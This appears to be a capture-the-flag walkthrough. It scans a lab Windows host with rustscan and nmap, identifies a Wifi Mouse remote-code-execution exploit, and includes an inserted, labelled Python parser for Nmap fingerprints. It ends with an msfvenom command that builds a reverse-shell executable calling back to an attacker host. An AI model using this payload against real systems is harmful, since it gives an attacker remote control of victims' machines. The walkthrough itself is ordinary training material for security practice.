When did Micky Mouse complete its half-century? The Micky Mouse event was the best event in the world 😁 Can you find the flag of the YCTF event?
Hint 1: Have you tried nmap -Pn?
(Direct/straight hint)
Hint 2: Micky Mouse's 50th year might help! It's the way to get inside!
(A quick Google search gives 1978 as Micky's 50th year.)
Let's begin the exploitation!
First we try to ping the machine, but get no response, as ICMP packets are blocked.
So, let's scan the target using rustscan:
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.145.192
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.145.192:1978
Open 10.10.145.192:3389
We can see above that ports 1978 and 3389 are open.
But using nmap, the output says the host is down:
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -vv
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning 10.10.145.192 [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for 10.10.145.192 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
To bypass this, we can add -Pn: the host is then reported as up and the port scan begins.
So we used the Nmap flags -Pn (skip host discovery, i.e. no ping), -O (OS detection) and -sV (service version detection), scanning only ports 1978 and 3389:
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -p1978,3389 -sV -O -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for 10.10.145.192
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
1978/tcp open unisql?
3389/tcp open ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind
SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n")%r(HTTPOp
SF:tions,13,"system\x20windows\x206\.1\n")%r(RTSPRequest,13,"system\x20win
SF:dows\x206\.1\n")%r(RPCCheck,13,"system\x20windows\x206\.1\n")%r(DNSVers
SF:ionBindReqTCP,13,"system\x20windows\x206\.1\n")%r(DNSStatusRequestTCP,1
SF:3,"system\x20windows\x206\.1\n")%r(Help,13,"system\x20windows\x206\.1\n
SF:")%r(SSLSessionReq,13,"system\x20windows\x206\.1\n")%r(TerminalServerCo
SF:okie,13,"system\x20windows\x206\.1\n")%r(TLSSessionReq,13,"system\x20wi
SF:ndows\x206\.1\n")%r(Kerberos,13,"system\x20windows\x206\.1\n")%r(SMBPro
SF:gNeg,13,"system\x20windows\x206\.1\n")%r(X11Probe,13,"system\x20windows
SF:\x206\.1\n")%r(FourOhFourRequest,13,"system\x20windows\x206\.1\n")%r(LP
SF:DString,13,"system\x20windows\x206\.1\n")%r(LDAPSearchReq,13,"system\x2
SF:0windows\x206\.1\n")%r(LDAPBindReq,13,"system\x20windows\x206\.1\n")%r(
SF:SIPOptions,13,"system\x20windows\x206\.1\n")%r(LANDesk-RC,13,"system\x2
SF:0windows\x206\.1\n")%r(TerminalServer,13,"system\x20windows\x206\.1\n")
SF:%r(NCP,13,"system\x20windows\x206\.1\n")%r(NotesRPC,13,"system\x20windo
SF:ws\x206\.1\n")%r(JavaRMI,13,"system\x20windows\x206\.1\n")%r(WMSRequest
SF:,13,"system\x20windows\x206\.1\n")%r(oracle-tns,13,"system\x20windows\x
SF:206\.1\n")%r(ms-sql-s,13,"system\x20windows\x206\.1\n")%r(afp,13,"syste
SF:m\x20windows\x206\.1\n")%r(giop,13,"system\x20windows\x206\.1\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds
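Added example, not part of the original writeup: a small Python parser for the SF-Port fingerprint block Nmap printed above. It joins the wrapped SF: lines, decodes Nmap's escaped responses and checks each hex length field; the three-probe excerpt is constructed from the scan output on this page. The result shows that every probe gets the same fixed "system windows 6.1" banner, which is what a search on port 1978 keys on and which a defender can match in their own scan results.

```python
import re
from collections import Counter

# Constructed excerpt of the Nmap fingerprint above (first three probes only).
SAMPLE_FINGERPRINT = r'''SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind
SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n");'''

# %r(ProbeName,HexLength,"escaped response")
PROBE_RE = re.compile(r'%r\(([^,]+),([0-9a-fA-F]+),"((?:[^"\\]|\\.)*)"\)')
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})|\\(.)')


def unescape(s: str) -> str:
    """Decode Nmap's fingerprint escaping: \\xHH for raw bytes, \\n \\r \\t,
    and a backslash before regex metacharacters (e.g. \\.) meaning the literal char."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return {'n': '\n', 'r': '\r', 't': '\t'}.get(m.group(2), m.group(2))
    return ESCAPE_RE.sub(repl, s)


def parse_fingerprint(text: str) -> dict:
    """Join the SF-Port header and SF: continuation lines (no separator: tokens
    wrap mid-word) and return {'port', 'proto', 'probes': {name: response}}."""
    joined, port, proto = '', None, None
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r'SF-Port(\d+)-(\w+):(.*)', line)
        if m:
            port, proto, joined = int(m.group(1)), m.group(2), joined + m.group(3)
        elif line.startswith('SF:'):
            joined += line[3:]
    probes = {}
    for name, hexlen, resp in PROBE_RE.findall(joined):
        decoded = unescape(resp)
        # A length mismatch means a mangled copy (e.g. a lost wrap line), not a real banner.
        if len(decoded.encode('latin-1')) != int(hexlen, 16):
            raise ValueError(f'length mismatch for probe {name}')
        probes[name] = decoded
    return {'port': port, 'proto': proto, 'probes': probes}


def banner_summary(fp: dict):
    """Return (number of distinct responses, most common response): a single
    fixed greeting for every probe is the hallmark of a simple custom listener."""
    counts = Counter(fp['probes'].values())
    return len(counts), counts.most_common(1)[0][0]
```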
We found out the service and OS running on the target. Then a simple search for "port 1978 unisql" leads to this first exploit: Wifi Mouse 1.7.8.5 - Remote Code Execution.
Before running it, create an MSF payload, specifying LHOST and LPORT:
┌──(root㉿kali)-[/]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes